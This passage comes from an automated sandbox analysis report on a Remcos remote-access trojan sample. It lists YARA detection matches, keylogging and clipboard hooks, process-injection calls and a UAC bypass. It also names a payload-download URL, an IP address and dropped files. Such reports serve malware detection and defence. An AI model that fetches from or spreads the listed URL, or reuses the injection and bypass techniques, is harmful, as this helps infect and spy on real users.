                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.maan2u.com/docs/233_Emxwenemixg
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.000000000060A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.maan2u.com/docs/233_Emxwenemixg5
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.maan2u.com/docs/233_Emxwenemixg8
                Source: SEPTobn3BR.exe, 00000000.00000002.1420164294.0000000000633000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.maan2u.com:443/docs/233_Emxwenemixg
                Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknown | HTTPS traffic detected: 103.82.231.117:443 -> 192.168.2.7:49710 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_03099340 SetWindowsHookExA 0000000D,0309932C,00000000 | 5_2_03099340
                Source: C:\Windows\SysWOW64\colorcpl.exe | Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exe
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_0309A65A OpenClipboard,GetClipboardData,CloseClipboard, | 5_2_0309A65A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A4EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 5_2_030A4EC1
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029A4EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, | 10_2_029A4EC1
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0309A65A OpenClipboard,GetClipboardData,CloseClipboard,5_2_0309A65A
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_03099468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,5_2_03099468
                Source: Yara matchFile source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.3812934475.00000000313BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.1623286615.000000001ECB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3812571420.00000000311A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1526792578.0000000000758000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3812685840.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000003.2755366865.00000000311F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3812571420.00000000311CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030AA76C SystemParametersInfoW
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029AA76C SystemParametersInfoW

                System Summary

                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 10.2.colorcpl.exe.2990000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 5.2.colorcpl.exe.3090000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 13.2.colorcpl.exe.2c00000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0.2.SEPTobn3BR.exe.2b80000.1.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000D.00000002.1606949388.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000000.00000002.1449264347.000000007E8E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 0000000A.00000002.1526920917.0000000002990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000005.00000002.3792390039.0000000003090000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
                Source: Process Memory Space: SEPTobn3BR.exe PID: 7648, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 7920, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 3232, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 6756, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Windows\SysWOW64\colorcpl.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B98584 NtQueueApcThread
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B979B4 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B97D00 NtWriteVirtualMemory
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B98BB0 GetThreadContext,SetThreadContext,NtResumeThread
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B98BAE GetThreadContext,SetThreadContext,NtResumeThread
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B979B2 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C08584 NtQueueApcThread
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C0DACC NtCreateFile,NtWriteFile,NtClose
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C0DA44 NtDeleteFile
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C0DBB0 NtOpenFile,NtReadFile,NtClose
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C079B4 NtAllocateVirtualMemory
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C07D00 NtWriteVirtualMemory
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C0D9F0 NtDeleteFile
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02C079B2 NtAllocateVirtualMemory
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C48584 NtQueueApcThread
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C4DACC RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C4DA44 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C4DBB0 RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C479B4 NtAllocateVirtualMemory
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C47D00 NtWriteVirtualMemory
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C48BAE GetThreadContext,SetThreadContext,NtResumeThread
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C48BB0 GetThreadContext,SetThreadContext,NtResumeThread
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C4D9F0 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C479B2 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B9EC74 InetIsOffline,CoInitialize,CoUninitialize,Sleep,MoveFileA,MoveFileA,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A4DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029A4DB4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C16316
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02B820C4
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C0614F
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C2C135
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C066DE
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02BFE43B
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C32960
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02BFCEA3
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C06EF0
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C1EF58
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C12C87
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C24C8C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C06D87
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C1F3B6
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C1F187
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C31A97
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02C17A9C
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: 0_2_02BF3E6F
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030E13D4
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C5286
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030B5152
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030D3700
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030B57FB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C569E
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C16FB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030E050B
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C6510
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030DABA9
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030B4BC3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030CDBFB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C5AD3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030AB917
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030B5964
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030CD9CC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030A28E3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C5F08
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030CDE2A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030ACEAF
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C4D8A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 5_2_030C3C0B
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 7_2_02BF20C4
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C5286
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029E13D4
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029B5152
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C569E
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C16FB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029B57FB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029D3700
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C6510
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029E050B
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C5AD3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029DABA9
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029B4BC3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029CDBFB
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029A28E3
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029CD9CC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029AB917
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029B5964
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029ACEAF
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029CDE2A
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C5F08
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C3C0B
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 10_2_029C4D8A
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: 11_2_02C320C4
                Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\Emxwenem.PIF 63C77A3F6CFA94CBC6A4C0C1475F02520592E58D6A03E8553E77A85A3F03C32F
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 029C2B90 appears 53 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 030C2B90 appears 53 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 030C2525 appears 41 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 029C2525 appears 41 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 02992073 appears 51 times
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: String function: 03092073 appears 51 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: String function: 02C3480C appears 619 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: String function: 02C346A4 appears 154 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: String function: 02BF46A4 appears 154 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: String function: 02BF480C appears 619 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: String function: 02C487A0 appears 48 times
                Source: C:\Users\Public\Libraries\Emxwenem.PIF | Code function: String function: 02C087A0 appears 48 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02B844D0 appears 32 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02B844AC appears 73 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02B846A4 appears 244 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02C1411C appears 44 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02B98824 appears 45 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02B987A0 appears 54 times
                Source: C:\Users\user\Desktop\SEPTobn3BR.exe | Code function: String function: 02B8480C appears 931 times
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1403060666.0000000021B36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EBF2000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1441622729.0000000021CD0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402765851.000000007F0B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1450958581.000000007F192000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1402447642.000000007EB73000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000003.1403402097.0000000021B6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A09000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe, 00000000.00000002.1439132054.0000000020A5A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs SEPTobn3BR.exe
                Source: SEPTobn3BR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.colorcpl.exe.2c00000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 5.2.colorcpl.exe.3090000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
                Source: 10.2.colorcpl.exe.2990000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
